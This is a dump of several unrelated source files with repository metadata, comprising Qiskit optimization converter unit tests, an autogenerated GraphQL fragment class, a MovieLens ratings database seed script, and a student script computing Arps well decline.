op2.linear_constraints[0].linear.to_dict()[0],
op2.linear_constraints[0].linear.to_dict()[1],
]
self.assertListEqual(lst, [1, 1])
self.assertEqual(op2.linear_constraints[0].sense, Constraint.Sense.EQ)
lst = [
op2.linear_constraints[1].linear.to_dict()[1],
op2.linear_constraints[1].linear.to_dict()[2],
op2.linear_constraints[1].linear.to_dict()[3],
]
self.assertListEqual(lst, [1, -1, 1])
lst = [op2.variables[3].lowerbound, op2.variables[3].upperbound]
self.assertListEqual(lst, [0, 3])
self.assertEqual(op2.linear_constraints[1].sense, Constraint.Sense.EQ)
lst = [
op2.linear_constraints[2].linear.to_dict()[0],
op2.linear_constraints[2].linear.to_dict()[2],
op2.linear_constraints[2].linear.to_dict()[4],
]
self.assertListEqual(lst, [1, 3, -1])
lst = [op2.variables[4].lowerbound, op2.variables[4].upperbound]
self.assertListEqual(lst, [0, 2])
self.assertEqual(op2.linear_constraints[2].sense, Constraint.Sense.EQ)
# For quadratic constraints
lst = [
op2.quadratic_constraints[0].quadratic.to_dict()[(0, 1)],
op2.quadratic_constraints[0].quadratic.to_dict()[(1, 2)],
op2.quadratic_constraints[0].linear.to_dict()[5],
]
self.assertListEqual(lst, [1, 2, 1])
lst = [op2.variables[5].lowerbound, op2.variables[5].upperbound]
self.assertListEqual(lst, [0, 3])
lst = [
op2.quadratic_constraints[1].quadratic.to_dict()[(0, 1)],
op2.quadratic_constraints[1].quadratic.to_dict()[(1, 2)],
op2.quadratic_constraints[1].linear.to_dict()[6],
]
self.assertListEqual(lst, [3, 4, -1])
lst = [op2.variables[6].lowerbound, op2.variables[6].upperbound]
self.assertListEqual(lst, [0, 4])
result = OptimizationResult(x=np.arange(7), fval=0, variables=op2.variables)
new_result = conv.interpret(result)
np.testing.assert_array_almost_equal(new_result.x, np.arange(3))
self.assertListEqual(new_result.variable_names, ['x0', 'x1', 'x2'])
self.assertDictEqual(new_result.variables_dict, {'x0': 0, 'x1': 1, 'x2': 2})
def test_inequality_integer(self):
""" Test InequalityToEqualityConverter with integer variables """
op = QuadraticProgram()
for i in range(3):
op.integer_var(name='x{}'.format(i), lowerbound=-3, upperbound=3)
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 2, 'x0x2')
# Quadratic constraints
quadratic = {('x0', 'x1'): 1, ('x1', 'x2'): 2}
op.quadratic_constraint({}, quadratic, Constraint.Sense.LE, 3, 'x0x1_x1x2LE')
quadratic = {('x0', 'x1'): 3, ('x1', 'x2'): 4}
op.quadratic_constraint({}, quadratic, Constraint.Sense.GE, 3, 'x0x1_x1x2GE')
conv = InequalityToEquality()
op2 = conv.convert(op)
self.assertListEqual([v.name for v in op2.variables],
['x0', 'x1', 'x2', 'x1x2@int_slack', 'x0x2@int_slack',
'x0x1_x1x2LE@int_slack', 'x0x1_x1x2GE@int_slack'])
# For linear constraints
lst = [
op2.linear_constraints[0].linear.to_dict()[0],
op2.linear_constraints[0].linear.to_dict()[1],
]
self.assertListEqual(lst, [1, 1])
self.assertEqual(op2.linear_constraints[0].sense, Constraint.Sense.EQ)
lst = [
op2.linear_constraints[1].linear.to_dict()[1],
op2.linear_constraints[1].linear.to_dict()[2],
op2.linear_constraints[1].linear.to_dict()[3],
]
self.assertListEqual(lst, [1, -1, 1])
lst = [op2.variables[3].lowerbound, op2.variables[3].upperbound]
self.assertListEqual(lst, [0, 8])
self.assertEqual(op2.linear_constraints[1].sense, Constraint.Sense.EQ)
lst = [
op2.linear_constraints[2].linear.to_dict()[0],
op2.linear_constraints[2].linear.to_dict()[2],
op2.linear_constraints[2].linear.to_dict()[4],
]
self.assertListEqual(lst, [1, 3, -1])
lst = [op2.variables[4].lowerbound, op2.variables[4].upperbound]
self.assertListEqual(lst, [0, 10])
self.assertEqual(op2.linear_constraints[2].sense, Constraint.Sense.EQ)
# For quadratic constraints
lst = [
op2.quadratic_constraints[0].quadratic.to_dict()[(0, 1)],
op2.quadratic_constraints[0].quadratic.to_dict()[(1, 2)],
op2.quadratic_constraints[0].linear.to_dict()[5],
]
self.assertListEqual(lst, [1, 2, 1])
lst = [op2.variables[5].lowerbound, op2.variables[5].upperbound]
self.assertListEqual(lst, [0, 30])
lst = [
op2.quadratic_constraints[1].quadratic.to_dict()[(0, 1)],
op2.quadratic_constraints[1].quadratic.to_dict()[(1, 2)],
op2.quadratic_constraints[1].linear.to_dict()[6],
]
self.assertListEqual(lst, [3, 4, -1])
lst = [op2.variables[6].lowerbound, op2.variables[6].upperbound]
self.assertListEqual(lst, [0, 60])
result = OptimizationResult(x=np.arange(7), fval=0, variables=op2.variables)
new_result = conv.interpret(result)
np.testing.assert_array_almost_equal(new_result.x, np.arange(3))
self.assertListEqual(new_result.variable_names, ['x0', 'x1', 'x2'])
self.assertDictEqual(new_result.variables_dict, {'x0': 0, 'x1': 1, 'x2': 2})
def test_inequality_mode_integer(self):
""" Test integer mode of InequalityToEqualityConverter() """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 2, 'x0x2')
conv = InequalityToEquality(mode='integer')
op2 = conv.convert(op)
lst = [op2.variables[3].vartype, op2.variables[4].vartype]
self.assertListEqual(lst, [Variable.Type.INTEGER, Variable.Type.INTEGER])
def test_inequality_mode_continuous(self):
""" Test continuous mode of InequalityToEqualityConverter() """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 2, 'x0x2')
conv = InequalityToEquality(mode='continuous')
op2 = conv.convert(op)
lst = [op2.variables[3].vartype, op2.variables[4].vartype]
self.assertListEqual(lst, [Variable.Type.CONTINUOUS, Variable.Type.CONTINUOUS])
def test_inequality_mode_auto(self):
""" Test auto mode of InequalityToEqualityConverter() """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1.1, 'x2': 2.2}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 3.3, 'x0x2')
conv = InequalityToEquality(mode='auto')
op2 = conv.convert(op)
lst = [op2.variables[3].vartype, op2.variables[4].vartype]
self.assertListEqual(lst, [Variable.Type.INTEGER, Variable.Type.CONTINUOUS])
def test_penalize_sense(self):
""" Test PenalizeLinearEqualityConstraints with senses """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 2, 'x0x2')
self.assertEqual(op.get_num_linear_constraints(), 3)
conv = LinearEqualityToPenalty()
with self.assertRaises(QiskitOptimizationError):
conv.convert(op)
def test_penalize_binary(self):
""" Test PenalizeLinearEqualityConstraints with binary variables """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 2, 'x0x2')
self.assertEqual(op.get_num_linear_constraints(), 3)
conv = LinearEqualityToPenalty()
op2 = conv.convert(op)
self.assertEqual(op2.get_num_linear_constraints(), 0)
result = OptimizationResult(x=np.arange(3), fval=0, variables=op2.variables)
new_result = conv.interpret(result)
self.assertEqual(new_result.status, OptimizationResultStatus.INFEASIBLE)
np.testing.assert_array_almost_equal(new_result.x, np.arange(3))
self.assertListEqual(result.variable_names, ['x0', 'x1', 'x2'])
self.assertDictEqual(result.variables_dict, {'x0': 0, 'x1': 1, 'x2': 2})
def test_penalize_integer(self):
""" Test PenalizeLinearEqualityConstraints with integer variables """
op = QuadraticProgram()
for i in range(3):
op.integer_var(name='x{}'.format(i), lowerbound=-3, upperbound=3)
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x2')
op.minimize(constant=3, linear={'x0': 1}, quadratic={('x1', 'x2'): 2})
self.assertEqual(op.get_num_linear_constraints(), 3)
conv = LinearEqualityToPenalty()
op2 = conv.convert(op)
self.assertEqual(op2.get_num_linear_constraints(), 0)
result = OptimizationResult(x=[0, 1, -1], fval=1, variables=op2.variables)
new_result = conv.interpret(result)
self.assertAlmostEqual(new_result.fval, 1)
self.assertEqual(new_result.status, OptimizationResultStatus.SUCCESS)
np.testing.assert_array_almost_equal(new_result.x, [0, 1, -1])
self.assertListEqual(result.variable_names, ['x0', 'x1', 'x2'])
self.assertDictEqual(result.variables_dict, {'x0': 0, 'x1': 1, 'x2': -1})
def test_integer_to_binary(self):
""" Test integer to binary """
op = QuadraticProgram()
for i in range(0, 2):
op.binary_var(name='x{}'.format(i))
op.integer_var(name='x2', lowerbound=0, upperbound=5)
linear = {}
for i, x in enumerate(op.variables):
linear[x.name] = i + 1
op.maximize(0, linear, {})
conv = IntegerToBinary()
op2 = conv.convert(op)
self.assertEqual(op2.get_num_vars(), 5)
self.assertListEqual([x.vartype for x in op2.variables], [Variable.Type.BINARY] * 5)
self.assertListEqual([x.name for x in op2.variables], ['x0', 'x1', 'x2@0', 'x2@1', 'x2@2'])
dct = op2.objective.linear.to_dict()
self.assertEqual(dct[2], 3)
self.assertEqual(dct[3], 6)
self.assertEqual(dct[4], 6)
def test_binary_to_integer(self):
""" Test binary to integer """
op = QuadraticProgram()
for i in range(0, 2):
op.binary_var(name='x{}'.format(i))
op.integer_var(name='x2', lowerbound=0, upperbound=5)
linear = {'x0': 1, 'x1': 2, 'x2': 1}
op.maximize(0, linear, {})
linear = {}
for x in op.variables:
linear[x.name] = 1
op.linear_constraint(linear, Constraint.Sense.EQ, 6, 'x0x1x2')
conv = IntegerToBinary()
op2 = conv.convert(op)
result = OptimizationResult(x=[0, 1, 1, 1, 1], fval=17, variables=op2.variables)
new_result = conv.interpret(result)
np.testing.assert_array_almost_equal(new_result.x, [0, 1, 5])
self.assertEqual(new_result.fval, 17)
self.assertListEqual(new_result.variable_names, ['x0', 'x1', 'x2'])
self.assertDictEqual(new_result.variables_dict, {'x0': 0, 'x1': 1, 'x2': 5})
def test_optimizationproblem_to_ising(self):
""" Test optimization problem to operators"""
op = QuadraticProgram()
for i in range(4):
op.binary_var(name='x{}'.format(i))
linear = {}
for x in op.variables:
linear[x.name] = 1
op.maximize(0, linear, {})
linear = {}
for i, x in enumerate(op.variables):
linear[x.name] = i + 1
op.linear_constraint(linear, Constraint.Sense.EQ, 3, 'sum1')
penalize = LinearEqualityToPenalty(penalty=1e5)
op2 = penalize.convert(op)
qubitop, offset = op2.to_ising()
self.assertEqual(qubitop, QUBIT_OP_MAXIMIZE_SAMPLE)
self.assertEqual(offset, OFFSET_MAXIMIZE_SAMPLE)
def test_ising_to_quadraticprogram_linear(self):
""" Test optimization problem to operators with linear=True"""
op = QUBIT_OP_MAXIMIZE_SAMPLE
offset = OFFSET_MAXIMIZE_SAMPLE
quadratic = QuadraticProgram()
quadratic.from_ising(op, offset, linear=True)
self.assertEqual(quadratic.get_num_vars(), 4)
self.assertEqual(quadratic.get_num_linear_constraints(), 0)
self.assertEqual(quadratic.get_num_quadratic_constraints(), 0)
self.assertEqual(quadratic.objective.sense, quadratic.objective.Sense.MINIMIZE)
self.assertAlmostEqual(quadratic.objective.constant, 900000)
linear_matrix = np.zeros((1, 4))
linear_matrix[0, 0] = -500001
linear_matrix[0, 1] = -800001
linear_matrix[0, 2] = -900001
linear_matrix[0, 3] = -800001
quadratic_matrix = np.zeros((4, 4))
quadratic_matrix[0, 1] = 400000
quadratic_matrix[0, 2] = 600000
quadratic_matrix[1, 2] = 1200000
quadratic_matrix[0, 3] = 800000
quadratic_matrix[1, 3] = 1600000
quadratic_matrix[2, 3] = 2400000
np.testing.assert_array_almost_equal(
quadratic.objective.linear.coefficients.toarray(), linear_matrix
)
np.testing.assert_array_almost_equal(
quadratic.objective.quadratic.coefficients.toarray(), quadratic_matrix
)
def test_ising_to_quadraticprogram_quadratic(self):
""" Test optimization problem to operators with linear=False"""
op = QUBIT_OP_MAXIMIZE_SAMPLE
offset = OFFSET_MAXIMIZE_SAMPLE
quadratic = QuadraticProgram()
quadratic.from_ising(op, offset, linear=False)
self.assertEqual(quadratic.get_num_vars(), 4)
self.assertEqual(quadratic.get_num_linear_constraints(), 0)
self.assertEqual(quadratic.get_num_quadratic_constraints(), 0)
self.assertEqual(quadratic.objective.sense, quadratic.objective.Sense.MINIMIZE)
self.assertAlmostEqual(quadratic.objective.constant, 900000)
quadratic_matrix = np.zeros((4, 4))
quadratic_matrix[0, 0] = -500001
quadratic_matrix[0, 1] = 400000
quadratic_matrix[0, 2] = 600000
quadratic_matrix[0, 3] = 800000
quadratic_matrix[1, 1] = -800001
quadratic_matrix[1, 2] = 1200000
quadratic_matrix[1, 3] = 1600000
quadratic_matrix[2, 2] = -900001
quadratic_matrix[2, 3] = 2400000
quadratic_matrix[3, 3] = -800001
np.testing.assert_array_almost_equal(
quadratic.objective.quadratic.coefficients.toarray(), quadratic_matrix
)
def test_continuous_variable_decode(self):
""" Test decode func of IntegerToBinaryConverter for continuous variables"""
try:
mdl = Model('test_continuous_variable_decode')
c = mdl.continuous_var(lb=0, ub=10.9, name='c')
x = mdl.binary_var(name='x')
mdl.maximize(c + x * x)
op = QuadraticProgram()
op.from_docplex(mdl)
converter = IntegerToBinary()
op = converter.convert(op)
admm_params = ADMMParameters()
qubo_optimizer = MinimumEigenOptimizer(NumPyMinimumEigensolver())
continuous_optimizer = CplexOptimizer()
solver = ADMMOptimizer(
qubo_optimizer=qubo_optimizer,
continuous_optimizer=continuous_optimizer,
params=admm_params,
)
result = solver.solve(op)
result = converter.interpret(result)
self.assertEqual(result.x[0], 10.9)
self.assertListEqual(result.variable_names, ['c', 'x'])
self.assertDictEqual(result.variables_dict, {'c': 10.9, 'x': 0})
except NameError as ex:
self.skipTest(str(ex))
def test_auto_penalty(self):
""" Test auto penalty function"""
op = QuadraticProgram()
op.binary_var('x')
op.binary_var('y')
op.binary_var('z')
op.minimize(constant=3, linear={'x': 1}, quadratic={('x', 'y'): 2})
op.linear_constraint(linear={'x': 1, 'y': 1, 'z': 1}, sense='EQ', rhs=2, name='xyz_eq')
lineq2penalty = LinearEqualityToPenalty(penalty=1e5)
lineq2penalty_auto = LinearEqualityToPenalty()
qubo = lineq2penalty.convert(op)
qubo_auto = lineq2penalty_auto.convert(op)
exact_mes = NumPyMinimumEigensolver()
exact = MinimumEigenOptimizer(exact_mes)
result = exact.solve(qubo)
result_auto = exact.solve(qubo_auto)
self.assertEqual(result.fval, result_auto.fval)
np.testing.assert_array_almost_equal(result.x, result_auto.x)
def test_auto_penalty_warning(self):
""" Test warnings of auto penalty function"""
op = QuadraticProgram()
op.binary_var('x')
op.binary_var('y')
op.binary_var('z')
op.minimize(linear={'x': 1, 'y': 2})
op.linear_constraint(linear={'x': 0.5, 'y': 0.5, 'z': 0.5}, sense='EQ', rhs=1, name='xyz')
with self.assertLogs('qiskit.optimization', level='WARNING') as log:
lineq2penalty = LinearEqualityToPenalty()
_ = lineq2penalty.convert(op)
warning = (
'WARNING:qiskit.optimization.converters.linear_equality_to_penalty:'
'Warning: Using 100000.000000 for the penalty coefficient because a float '
'coefficient exists in constraints. \nThe value could be too small. If so, '
'set the penalty coefficient manually.'
)
self.assertIn(warning, log.output)
def test_linear_equality_to_penalty_decode(self):
""" Test decode func of LinearEqualityToPenalty"""
qprog = QuadraticProgram()
qprog.binary_var('x')
qprog.binary_var('y')
qprog.binary_var('z')
qprog.maximize(linear={'x': 3, 'y': 1, 'z': 1})
qprog.linear_constraint(linear={'x': 1, 'y': 1, 'z': 1}, sense='EQ', rhs=2, name='xyz_eq')
lineq2penalty = LinearEqualityToPenalty()
qubo = lineq2penalty.convert(qprog)
exact_mes = NumPyMinimumEigensolver()
exact = MinimumEigenOptimizer(exact_mes)
result = exact.solve(qubo)
decoded_result = lineq2penalty.interpret(result)
self.assertEqual(decoded_result.fval, 4)
np.testing.assert_array_almost_equal(decoded_result.x, [1, 1, 0])
self.assertEqual(decoded_result.status, OptimizationResultStatus.SUCCESS)
self.assertListEqual(decoded_result.variable_names, ['x', 'y', 'z'])
self.assertDictEqual(decoded_result.variables_dict, {'x': 1.0, 'y': 1.0, 'z': 0.0})
infeasible_result = OptimizationResult(x=[1, 1, 1], fval=0, variables=qprog.variables)
decoded_infeasible_result = lineq2penalty.interpret(infeasible_result)
self.assertEqual(decoded_infeasible_result.fval, 5)
np.testing.assert_array_almost_equal(decoded_infeasible_result.x, [1, 1, 1])
self.assertEqual(decoded_infeasible_result.status, OptimizationResultStatus.INFEASIBLE)
self.assertListEqual(infeasible_result.variable_names, ['x', 'y', 'z'])
self.assertDictEqual(infeasible_result.variables_dict, {'x': 1.0, 'y': 1.0, 'z': 1.0})
def test_empty_problem_deprecated(self):
""" Test empty problem """
op = QuadraticProgram()
conv = InequalityToEquality()
op = conv.encode(op)
conv = IntegerToBinary()
op = conv.encode(op)
conv = LinearEqualityToPenalty()
op = conv.encode(op)
conv = QuadraticProgramToIsing()
_, shift = conv.encode(op)
self.assertEqual(shift, 0.0)
def test_valid_variable_type_deprecated(self):
"""Validate the types of the variables for QuadraticProgramToIsing."""
# Integer variable
with self.assertRaises(QiskitOptimizationError):
op = QuadraticProgram()
op.integer_var(0, 10, "int_var")
conv = QuadraticProgramToIsing()
_ = conv.encode(op)
# Continuous variable
with self.assertRaises(QiskitOptimizationError):
op = QuadraticProgram()
op.continuous_var(0, 10, "continuous_var")
conv = QuadraticProgramToIsing()
_ = conv.encode(op)
def test_optimizationproblem_to_ising_deprecated(self):
""" Test optimization problem to operators"""
op = QuadraticProgram()
for i in range(4):
op.binary_var(name='x{}'.format(i))
linear = {}
for x in op.variables:
linear[x.name] = 1
op.maximize(0, linear, {})
linear = {}
for i, x in enumerate(op.variables):
linear[x.name] = i + 1
op.linear_constraint(linear, Constraint.Sense.EQ, 3, 'sum1')
penalize = LinearEqualityToPenalty(penalty=1e5)
op2ope = QuadraticProgramToIsing()
op2 = penalize.encode(op)
qubitop, offset = op2ope.encode(op2)
self.assertEqual(qubitop, QUBIT_OP_MAXIMIZE_SAMPLE)
self.assertEqual(offset, OFFSET_MAXIMIZE_SAMPLE)
def test_ising_to_quadraticprogram_linear_deprecated(self):
""" Test optimization problem to operators with linear=True"""
op = QUBIT_OP_MAXIMIZE_SAMPLE
offset = OFFSET_MAXIMIZE_SAMPLE
op2qp = IsingToQuadraticProgram(linear=True)
quadratic = op2qp.encode(op, offset)
self.assertEqual(len(quadratic.variables), 4)
self.assertEqual(len(quadratic.linear_constraints), 0)
self.assertEqual(len(quadratic.quadratic_constraints), 0)
self.assertEqual(quadratic.objective.sense, quadratic.objective.Sense.MINIMIZE)
self.assertAlmostEqual(quadratic.objective.constant, 900000)
linear_matrix = np.zeros((1, 4))
linear_matrix[0, 0] = -500001
linear_matrix[0, 1] = -800001
linear_matrix[0, 2] = -900001
linear_matrix[0, 3] = -800001
quadratic_matrix = np.zeros((4, 4))
quadratic_matrix[0, 1] = 400000
quadratic_matrix[0, 2] = 600000
quadratic_matrix[1, 2] = 1200000
quadratic_matrix[0, 3] = 800000
quadratic_matrix[1, 3] = 1600000
quadratic_matrix[2, 3] = 2400000
np.testing.assert_array_almost_equal(
quadratic.objective.linear.coefficients.toarray(), linear_matrix
)
np.testing.assert_array_almost_equal(
quadratic.objective.quadratic.coefficients.toarray(), quadratic_matrix
)
def test_ising_to_quadraticprogram_quadratic_deprecated(self):
""" Test optimization problem to operators with linear=False"""
op = QUBIT_OP_MAXIMIZE_SAMPLE
offset = OFFSET_MAXIMIZE_SAMPLE
op2qp = IsingToQuadraticProgram(linear=False)
quadratic = op2qp.encode(op, offset)
self.assertEqual(len(quadratic.variables), 4)
self.assertEqual(len(quadratic.linear_constraints), 0)
self.assertEqual(len(quadratic.quadratic_constraints), 0)
self.assertEqual(quadratic.objective.sense, quadratic.objective.Sense.MINIMIZE)
self.assertAlmostEqual(quadratic.objective.constant, 900000)
quadratic_matrix = np.zeros((4, 4))
quadratic_matrix[0, 0] = -500001
quadratic_matrix[0, 1] = 400000
quadratic_matrix[0, 2] = 600000
quadratic_matrix[0, 3] = 800000
quadratic_matrix[1, 1] = -800001
quadratic_matrix[1, 2] = 1200000
quadratic_matrix[1, 3] = 1600000
quadratic_matrix[2, 2] = -900001
quadratic_matrix[2, 3] = 2400000
quadratic_matrix[3, 3] = -800001
np.testing.assert_array_almost_equal(
quadratic.objective.quadratic.coefficients.toarray(), quadratic_matrix
)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
0b3eeb02095fbf2030db653bc03576071c4a956a | 9672fa478478085b69c7ef8f02eaa7fa0bc7767b | /symphony/cli/pyinventory/graphql/fragment/service_endpoint.py | f22a4f54006c151f24a0aaab059869fd9813ff4f | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | julianchr/magma | 437a1d86490ff5f1d279cf2cd3243bbd3f22f715 | f0b2ed7e08314208133cf722921d6e6ab7853825 | refs/heads/master | 2022-09-21T21:45:14.678593 | 2020-05-28T22:47:52 | 2020-05-28T22:49:52 | 267,723,888 | 0 | 0 | NOASSERTION | 2020-05-29T00:07:02 | 2020-05-29T00:07:01 | null | UTF-8 | Python | false | false | 1,352 | py | #!/usr/bin/env python3
# @generated AUTOGENERATED file. Do not Change!
from dataclasses import dataclass
from datetime import datetime
from gql.gql.datetime_utils import DATETIME_FIELD
from gql.gql.graphql_client import GraphqlClient
from gql.gql.client import OperationException
from gql.gql.reporter import FailedOperationException
from functools import partial
from numbers import Number
from typing import Any, Callable, List, Mapping, Optional
from time import perf_counter
from dataclasses_json import DataClassJsonMixin
from ..fragment.equipment_port import EquipmentPortFragment, QUERY as EquipmentPortFragmentQuery
from ..fragment.service_endpoint_definition import ServiceEndpointDefinitionFragment, QUERY as ServiceEndpointDefinitionFragmentQuery
QUERY: List[str] = EquipmentPortFragmentQuery + ServiceEndpointDefinitionFragmentQuery + ["""
fragment ServiceEndpointFragment on ServiceEndpoint {
id
port {
...EquipmentPortFragment
}
definition {
...ServiceEndpointDefinitionFragment
}
}
"""]
@dataclass
class ServiceEndpointFragment(DataClassJsonMixin):
@dataclass
class EquipmentPort(EquipmentPortFragment):
pass
@dataclass
class ServiceEndpointDefinition(ServiceEndpointDefinitionFragment):
pass
id: str
definition: ServiceEndpointDefinition
port: Optional[EquipmentPort]
| [
"[email protected]"
] | |
548980782c09a047bbcc43b0e12a6dae822cdcc6 | ed1d841dbd836f5a02a8b2c22bcc92380f28d11b | /seed.py | 9b08aa64301e4ced1c79ad9d8a6e7a7e4658118c | [] | no_license | GraceDurham/ratings | b063389f368f0b3994f0771ca4cac46555a04a10 | 2e628c2a824ca5a10879a15282cd60e21695322b | refs/heads/master | 2020-05-23T07:59:29.310561 | 2017-02-03T02:00:36 | 2017-02-03T02:00:36 | 80,483,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,894 | py | """Utility file to seed ratings database from MovieLens data in seed_data/"""
from sqlalchemy import func
from model import User
from model import Rating
from model import Movie
from datetime import datetime
from model import connect_to_db, db
from server import app
def load_users():
"""Load users from u.user into database."""
print "Users"
# Delete all rows in table, so if we need to run this a second time,
# we won't be trying to add duplicate users
User.query.delete()
# Read u.user file and insert data
for row in open("seed_data/u.user"):
row = row.rstrip()
user_id, age, gender, occupation, zipcode = row.split("|")
user = User(user_id=user_id,
age=age,
zipcode=zipcode)
# We need to add to the session or it won't ever be stored
db.session.add(user)
# Once we're done, we should commit our work
db.session.commit()
def load_movies():
"""Load movies from u.item into database."""
print "Movies"
# Delete all rows in table, so if we need to run this a second time,
# we won't be trying to add duplicate users
Movie.query.delete()
# Read u.user file and insert data
for row in open("seed_data/u.item"):
# striped the whitespace
row = row.rstrip()
# print "each row!", row
# we took the row and split it on the pipe
row_split = row.split("|")
# print "it's splitted!!", row_split
# sliced the giant list into only 0-4 index
first_five = row_split[:5]
# print "this is our short list", first_five
# unpacked the first five items from the u.item list
movie_id, title, released_at, empty, imdb_url = first_five
# print first_five
#Boolean if released at is not an empty string evaluates true
#set string to datetime object
# else make datetime equal none if no value is present in release at
if released_at:
released_at = datetime.strptime(released_at, "%d-%b-%Y")
else:
released_at = None
title = title[:-7] # (year) ==7
movie = Movie(movie_id=movie_id,
title=title,
released_at=released_at,
imdb_url=imdb_url)
# We need to add to the session or it won't ever be stored
db.session.add(movie)
# Once we're done, we should commit our work
db.session.commit()
def load_ratings():
"""Load ratings from u.data into database."""
print "Ratings"
# Delete all rows in table, so if we need to run this a second time,
# we won't be trying to add duplicate users
Rating.query.delete()
# Read u.user file and insert data
for row in open("seed_data/u.data"):
row = row.strip().split()
user_id, movie_id, score, time_stamp = row
# print row
rating = Rating(
user_id=int(user_id),
movie_id=int(movie_id),
score=int(score))
# We need to add to the session or it won't ever be stored
db.session.add(rating)
# Once we're done, we should commit our work
db.session.commit()
def set_val_user_id():
"""Set value for the next user_id after seeding database"""
# Get the Max user_id in the database
result = db.session.query(func.max(User.user_id)).one()
max_id = int(result[0])
# Set the value for the next user_id to be max_id + 1
query = "SELECT setval('users_user_id_seq', :new_id)"
db.session.execute(query, {'new_id': max_id + 1})
db.session.commit()
if __name__ == "__main__":
connect_to_db(app)
# In case tables haven't been created, create them
db.create_all()
# Import different types of data
load_users()
load_movies()
load_ratings()
set_val_user_id()
| [
"[email protected]"
] | |
38af83d170297d348201ba84ec024ff6782f1b88 | e6dab5aa1754ff13755a1f74a28a201681ab7e1c | /.parts/lib/django-1.4/tests/regressiontests/admin_custom_urls/urls.py | 12f440e54206905c1883af69161ca4715a9ff7be | [] | no_license | ronkagan/Euler_1 | 67679203a9510147320f7c6513eefd391630703e | 022633cc298475c4f3fd0c6e2bde4f4728713995 | refs/heads/master | 2021-01-06T20:45:52.901025 | 2014-09-06T22:34:16 | 2014-09-06T22:34:16 | 23,744,842 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 113 | py | /home/action/.parts/packages/googleappengine/1.9.4/lib/django-1.4/tests/regressiontests/admin_custom_urls/urls.py | [
"[email protected]"
] | |
f7c2105bdadbd86b2600eff80773427f74aa8d3b | 525f39ec2fe53bcd65ff13b87c7a900358e30c1c | /Lab3B/1C.py | a539436e5493292aab72694f459c7520aa9e2d66 | [] | no_license | abdullah2808/ENGR_102 | fc2cbda672c407d8cf24c14238c2354516c8d7d7 | 6b3080e01c162e16b207df0099427368ab231af9 | refs/heads/master | 2022-12-14T23:49:56.090186 | 2020-09-13T21:31:12 | 2020-09-13T21:31:12 | 295,239,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | # By submitting this assignment, I agree to the following:
# “Aggies do not lie, cheat, or steal, or tolerate those who do”
# “I have not given or received any unauthorized aid on this assignment”
#
# Name: ABDULLAH AHMAD
# Section: 518
# Assignment: LAB 3B - 1C
# Date: 13/9/18
Days = int(input("Please enter the amount of days of production: "))
Initial = int(input("Please enter the initial production of the well: "))
Decline = int(input("Please enter the decline rate of the well: " ))
HyperCons = .8
Arps = (Initial/((1 + (HyperCons * Decline * Days ))**(1/HyperCons )))
print ("The production of a well after", Days, "days and with a hyperbolic constant of .8 is", Arps) # ARPS EQUATION
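# Worked example of the hyperbolic Arps equation above (hypothetical inputs; note
# the script casts every input to int, so whole-number values are used here):
# with Initial = 500, Decline = 1 and Days = 10,
#   production = 500 / (1 + 0.8 * 1 * 10) ** (1 / 0.8)
#              = 500 / 9 ** 1.25 = 500 / (9 * 3 ** 0.5) ≈ 32.1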
| [
"[email protected]"
] | |
